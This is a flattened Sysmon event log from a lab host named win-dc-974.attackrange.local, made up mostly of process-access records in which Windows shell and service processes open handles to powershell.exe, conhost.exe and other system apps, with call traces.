22:52:57.098{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.098{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968020C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.098{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.098{05ADC7E1-29F2-6039-CE05-00000000AD01}24643672C:\Windows\system32\taskhostw.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968800C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+109f4|C:\Windows\explorer.exe+1e118|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968800C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+109f4|C:\Windows\explorer.exe+1e118|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968800C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+16679|C:\Windows\System32\SHELL32.dll+af480|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968800C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57968800C:\Windows\explorer.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aecdf|C:\Windows\System32\SHELL32.dll+b0420|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+95ad0|C:\Windows\System32\SHELL32.dll+b03dc|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b03b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.082{05ADC7E1-1E7A-603D-D07D-00000000AD01}57965212C:\Windows\explorer.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.067{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.067{05ADC7E1-229F-6039-0C00-00000000AD01}5888292C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.067{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.067{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.067{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001694564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.067{05ADC7E1-29F2-6039-CC05-00000000AD01}31327616C:\Windows\system32\sihost.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694563Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.052{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694562Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.052{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694561Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.052{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001694560Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.052{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F50C5AAE5E0DB8F7E6D52A25E3D4AF4,SHA256=70EB9C7D201E7AAB31B91E75371EAC6D94ADB5BEAC9D96CF659E6A13EE8A2EB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001694559Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.035{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001694558Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.035{05ADC7E1-1E7A-603D-D07D-00000000AD01}57961296C:\Windows\explorer.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+27e9|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+66c5f|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+63356|C:\Windows\System32\combase.dll+62b0a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001694557Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.035{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001694556Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.035{05ADC7E1-229F-6039-0C00-00000000AD01}5887876C:\Windows\system32\svchost.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694555Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 